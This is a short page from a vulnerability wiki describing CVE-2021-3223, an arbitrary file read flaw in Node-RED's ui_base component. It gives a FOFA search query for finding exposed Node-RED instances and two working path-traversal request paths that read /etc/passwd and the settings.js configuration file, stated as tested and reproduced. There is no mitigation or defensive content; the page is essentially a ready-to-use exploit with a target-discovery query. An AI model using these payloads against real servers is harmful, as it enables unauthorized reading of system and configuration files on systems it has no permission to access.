Loading
0

CVE-2021-3223 Node-RED ui base 任意文件读取漏洞/en

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

Check.png The vulnerability has been verified


The EXP/POC/Payload on this page has been tested and available, and the vulnerability has been successfully reproduced.

Vulnerability Impact

Node-RED

FOFA

title="Node-RED"

POC

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

免费、自由、人人可编辑的漏洞库--pwnwiki.com